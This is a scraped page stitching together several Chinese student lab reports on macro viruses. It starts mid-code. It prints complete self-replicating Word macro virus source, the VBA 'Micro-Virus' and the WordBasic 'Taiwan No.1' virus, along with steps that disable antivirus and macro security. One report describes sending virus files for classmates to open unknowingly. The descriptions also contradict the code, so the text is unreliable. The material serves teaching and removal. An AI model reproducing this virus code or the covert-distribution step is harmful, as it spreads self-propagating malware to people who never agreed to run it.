1MacroCopy "AutoOpen", filem$End Ifexit:End Sub该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:何谓宏病毒答案:我就是......将系统日期设为XX月1号如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:计算机宏病毒1). 新建Word 文档并打开2). 调出开发工具,设置宏的等级,启用宏3). 创建宏,命名AutoExec 编辑4). 编辑宏,语法上注意VBA 版本保存5). 关闭所有Word(必须)6). 再次打开Word 文档,宏病毒爆发,弹出刚刚编写的msgbox 窗口7). 启动任务管理器结束进程搜索winword.exe 文件,并确定复制其位置8). 启用CMD,定位winword 位置:输入命令,用参数来打开安全模式winword.exe /a(执行此命令2 次)第一次安全模式第二次新建文档进行宏的打开设置来禁用宏9). 搜索normal.dotm 等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板10). 简易摆脱宏完成,重新打开word,没有被感染。
2021计算机病毒实验报告
![2021计算机病毒实验报告](https://img.taocdn.com/s3/m/0c26f08ddb38376baf1ffc4ffe4733687e21fcd6.png)
2021计算机病毒实验报告实验报告:2021计算机病毒实验报告一、实验目的本实验旨在通过分析计算机病毒的基本特性、传播途径和危害,提高对计算机病毒的防范意识和应对能力,为后续的计算机安全学习打下基础。
二、实验原理计算机病毒是一种恶意软件,它能够复制自身并且在计算机之间传播,对计算机系统造成潜在的危害。
计算机病毒通常隐藏在看似无害的程序或数据文件中,一旦被激活,会破坏数据、泄露信息、使系统崩溃等。
三、实验环境与工具1.实验操作系统:Windows 102.实验工具:U盘、网络连接、电子邮件、即时通讯软件等四、实验步骤与内容1.准备阶段在实验开始前,我们需要了解不同类型的计算机病毒,如蠕虫病毒、木马病毒、宏病毒等。
这些病毒有着不同的传播途径和危害程度。
同时,还需了解计算机病毒的命名规则和文件后缀名,以便在遇到时快速识别。
2.传播阶段首先,通过U盘将计算机病毒复制到实验计算机中。
常见的病毒文件后缀名包括.exe.bat.pif等。
接着,通过网络连接和电子邮件等方式,将病毒文件发送给其他同学。
要求对方在不知情的情况下打开并运行这些文件,观察并记录实验结果。
3.分析阶段通过分析被感染的计算机系统,我们发现计算机病毒的存在会导致系统运行缓慢、异常重启等问题。
有些病毒还会弹出虚假警告信息,欺骗用户点击危险链接或者下载病毒文件。
此外,病毒还会通过修改注册表、隐藏进程等方式来躲避检测和删除。
4.清除阶段在确定感染病毒的计算机后,我们使用杀毒软件进行全盘扫描和清除操作。
同时,针对不同类型的病毒,需要采取不同的清除方式。
如蠕虫病毒可使用防病毒软件进行拦截和清除,木马病毒则可通过禁用启动项和服务等方法清除。
若清除失败,可能需要手动删除受感染的文件或目录。
五、实验结果与数据分析通过本次实验,我们成功地激活并传播了计算机病毒。
在分析过程中,我们发现计算机病毒会对计算机系统造成严重的危害,如数据损坏、信息泄露、系统崩溃等。
其中,通过网络传播的病毒速度更快、范围更广。
计算机病毒实验之宏病毒
![计算机病毒实验之宏病毒](https://img.taocdn.com/s3/m/86671a4833687e21af45a93d.png)
计算机病毒实验报告实验3.2 台湾No.1宏病毒3.2 台湾No.1宏病毒3.2.1 实验目的了解台湾No.1宏病毒的基本概念实验自己的台湾No.1宏病毒3.2.2 实验原理台湾No.1宏病毒实际上是一个含有恶意代码的Word自动宏,其代码主要是造成恶作剧,并且有可能使用户计算机因为使用资源枯竭而瘫痪。
3.2.3 实验预备知识点】什么是Word宏对VBA语言有一定的了解3.2.4 实验环境操作系统:WINDOWS2000JDK版本:Java Standard Edition 1.4.0以上数据库:MysqlWeb服务器:TomacatOffice版本:MS office2000/20033.2.5 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界,输入用户名和密码。
(注意:实验前先关闭所有杀毒软件。
)1.病毒感染实验由于该病毒特征码明显,因此请首先将病毒防火墙关闭,将系统时间调整到13日。
进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒感染实验”,要根据要求和提示操作配置客户端的邮件地址,如下图3-2-1所示。
根据提示下载提供的台湾No.1病毒,亲自运行并记录自己的实验报告。
图3-2-1 病毒样本下载页面2.病毒代码分析进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“病毒代码分析”,可以分析页面中的台湾No.1病毒源代码,根据相关代码分析,填写页面中空白的参数,点击确定系统将自动生成代码。
新建一个word文档作为自己编写的该病毒文件,然后把生成的代码复制并粘帖至Word自带的VBA编译工具中,可以参照美丽莎宏病毒实验中的图4-3至4-4 。
将自行编制的病毒备份待用。
3.杀毒实验进入病毒防护教学实验后,点击左侧的“台湾N0.1宏病毒”,然后在点击下面的“杀毒实验”,学习病毒防范方法,根据系统页面上的提示,使用手动杀毒,并写入实验报告中。
计算机病毒实验报告(范文)
![计算机病毒实验报告(范文)](https://img.taocdn.com/s3/m/0f74bbab970590c69ec3d5bbfd0a79563c1ed43e.png)
计算机病毒实验报告计算机病毒实验报告篇一:201X15张三-计算机病毒实验报告计算机与信息学院《计算机病毒与反病毒》实验报告学生姓名:学号:专业班级:计算机科学与技术09-2班 201X年 5 月15 日说明1.本实验报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
2.实验报告严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.实验报告要排版,格式应规范,截图一律采用JPG格式(非BMP 格式)。
为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。
实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。
4.实验报告须说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只提交实验报告电子版。
在5月31日前,通过电子邮件发送到hfutZRB@163.,若三天之内没有收到内容为“已收到”的回复确认Em ail,请再次发送或电话联系任课老师。
6.为了便于归档,实验报告rd文档的命名方式是“学号姓名-计算机病毒实验报告.d c”,如“201X15张三-计算机病毒实验报告.dc”。
注意:提交实验报告截止日期时间是实验一程序的自动启动一、实验目的(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟悉杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。
罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。
(2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。
实验五 类TaiWan NO.1病毒实验
![实验五 类TaiWan NO.1病毒实验](https://img.taocdn.com/s3/m/187ba3a06c175f0e7dd137a2.png)
实验五类TaiWan NO.1病毒实验1.实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
2.实验所需条件和环境硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问实验环境配置如下图所示:受感染终端被感染终端宏病毒传播示意图3.实验内容和分析为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
3.1. 例1 自我复制,感染word公用模板和当前文档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机病毒
实验报告
姓名:
学号:
老师:
日期:
一. 实验目的
台湾1号病毒是一种破坏力较大的宏病毒!Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过台湾1号病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
二. 实验内容
1. macro virus中的内容
2.计算机病毒篇 ---->计算机宏病毒
三. 实验环境
1. macro virus
硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统
支撑软件:Word 2003
软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.
实验环境配置如下图所示:
受感染终端受感染
Word 文档
被感染终端
2.计算机宏病毒
硬件设备:部署 WIN2003 系统的PC 机一台
软件工具:Office word2007
四.实验步骤及截图
台湾1号病毒代码
Taiwan No.1 病毒原始码
Dim Shared nm(4)
Sub MAIN
DisableInput 1
If Day(Now()) = 13 Then
try:
On Error Goto 0
On Error Goto try
test = - 1
con = 1
tog$ = ""
i = 0
While test = - 1
For i = 0 To 4
nm(i) = Int(Rnd() * 10000)
con = (con * nm(i))
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + " =?"
Goto beg
End If
tog$ = tog$ + Str$(nm(i)) + " *"
Next i
rem 随机选出四个千位数, 以便等一下的游戏
Beep
rem 电脑发出" 哔"一声
ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /
"若你答错,只好接受震撼教育.............." + Chr$(13) + /
tog$, "台湾NO.1 Macro Virus")
rem 开个对话盒, 以便输入解答用
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
MsgBox "恭贺你答对了,按确定就告诉你想知道的....", /
"台湾NO.1 Macro Virus"
FileNewDefault
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "何谓巨集病毒?"
InsertPara
Insert "答案:"
Italic 1
Insert "我就是....."
InsertPara
InsertPara
Italic 0
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Beep
Insert "如何预防巨集病毒?"
InsertPara
Beep
Insert "答案:"
Italic 1
Insert "不要看我....."
Goto exit
Else
For j = 1 To 20
Beep
FileNewDefault
Next j
CenterPara
FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"
Goto try
End If
Wend
End If
nor = CountMacros(0)
If nor > 0 Then
For kk = 1 To nor
If MacroName$(kk, 0) = "AutoOpen" Then t = 1
End If
Next kk
End If
file$ = FileName$()
filem$ = file$ + ":AutoOpen"
If t <> 1 Then
MacroCopy filem$, "AutoOpen"
MacroCopy filem$, "AutoNew"
MacroCopy filem$, "AutoClose"
End If
nor1 = CountMacros(1)
If nor1 > 0 Then
For kkk = 1 To nor1
If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1
End If
Next kkk
End If
If tt <> 1 Then
FileSaveAs .Format = 1
MacroCopy "AutoOpen", filem$
End If
exit:
End Sub
该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:我就是......
将系统日期设为XX月1号
如果答错,就会不停地刷屏,然后继续让你答题,否则跳出如下界面:
计算机宏病毒
1). 新建Word 文档并打开
2). 调出开发工具,设置宏的等级,启用宏
3). 创建宏,命名AutoExec 编辑
4). 编辑宏,语法上注意VBA 版本保存
5). 关闭所有Word(必须)
6). 再次打开Word 文档,宏病毒爆发,弹出刚刚编写的msgbox 窗口
7). 启动任务管理器结束进程
搜索winword.exe 文件,并确定复制其位置
8). 启用CMD,定位winword 位置:
输入命令,用参数来打开安全模式winword.exe /a(执行此命令2 次)第一次安全模式
第二次新建文档
进行宏的打开设置来禁用宏
9). 搜索normal.dotm 等模板文件,若搜索不出东西,在高级选项中选中搜索隐藏文件及系统文件即可,并删除那个文件夹下的所有模板
10). 简易摆脱宏完成,重新打开word,没有被感染。
五. 总结与心得
在使用电脑的过程中,我们要加强电脑的安全指数,要有防范意识,防止网络病毒的入侵!特别是在现代网络发达的社会,一旦被高级病毒入侵,很有可能带来重大损失!同时也应该学好病毒知识,这样,我们就可以知道如何去解决病毒问题,让我们免受损失!。